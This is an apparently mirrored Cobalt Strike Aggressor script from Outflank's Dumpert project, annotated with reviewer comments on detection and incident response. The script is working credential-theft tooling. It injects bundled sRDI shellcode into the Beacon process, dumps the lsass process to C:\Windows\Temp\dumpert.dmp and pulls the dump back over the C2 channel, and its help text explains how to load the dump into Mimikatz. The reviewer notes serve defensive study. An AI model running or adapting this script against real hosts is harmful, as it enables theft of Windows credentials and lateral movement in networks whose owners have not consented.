mirror of
https://github.com/outflanknl/Dumpert.git
synced 2026-06-08 08:35:19 +00:00
#author Cornelis de Plaa
#@outflank.nl

#Injects sRDI shellcode (shellcode Reflective DLL Injection) into the current process and creates a minidump of the lsass process.
#See https://github.com/monoxgas/sRDI

#register help
# Registers the "dumpert" command in the Beacon console help: a short
# description followed by the long help text (synopsis, what the command does,
# and how the resulting dump is consumed).
# Reviewer note: the help text itself states that the output is an LSASS
# minidump intended for offline parsing, so the file this command produces
# contains credential material and should be handled as such.
beacon_command_register(
    "dumpert",
    "Create a minidump of lsass process",
    "Synopsis: dumpert\n\n" .
    "Creates a minidump of lsass process using sRDI shellcode injection and downloads minidump file.\n" .
    "Lsass minidump can be imported in Mimikatz using: \"sekurlsa::minidump dumpert.dmp\"");
# dumpert alias: runs the bundled sRDI shellcode inside the Beacon's own
# process, waits, then asks the Beacon to send back the minidump file.
#
# $1 is the Beacon ID supplied to every alias. The command refuses to run
# unless the Beacon is elevated and 64-bit.
#
# Reviewer notes (detection / response):
#  - The dump is requested from a fixed path, C:\Windows\Temp\dumpert.dmp.
#    File-creation telemetry for that path is a direct indicator of this
#    script having been used on a host.
#  - Nothing in this alias deletes the file after the download is queued;
#    whether the payload removes it is not visible here. During incident
#    response, check for a leftover dump and treat it as credential material.
#  - The shellcode is injected into the Beacon's current process (its own
#    pid), not into a newly spawned one.
alias dumpert {
	$bid = $1;
	# pid of the process the Beacon is running in; used as the injection target
	$curr_pid = beacon_info($bid, "pid");

	# Guard 1: an elevated Beacon is required.
	if (!-isadmin $bid) {
		berror($bid, "You need elevated privileges.");
		return;
	}

	blog($bid, "Dumpert by Outflank");

	# Guard 2: only an x64 payload (Outflank-Dumpert.bin) is shipped.
	if (!-is64 $bid) {
		berror($bid, "Dumpert is x64 only.");
		return;
	}

	# Payload file is resolved relative to this script's location.
	bshinject($bid, $curr_pid, "x64", script_resource("Outflank-Dumpert.bin"));
	blog($bid, "Waiting a few seconds for task to complete...");

	# Fixed 10000 ms pause before the download is queued; this alias does not
	# verify that the dump file exists first.
	bpause($bid, 10000);
	bdownload($bid, "C:\\Windows\\Temp\\dumpert.dmp");
	return;
}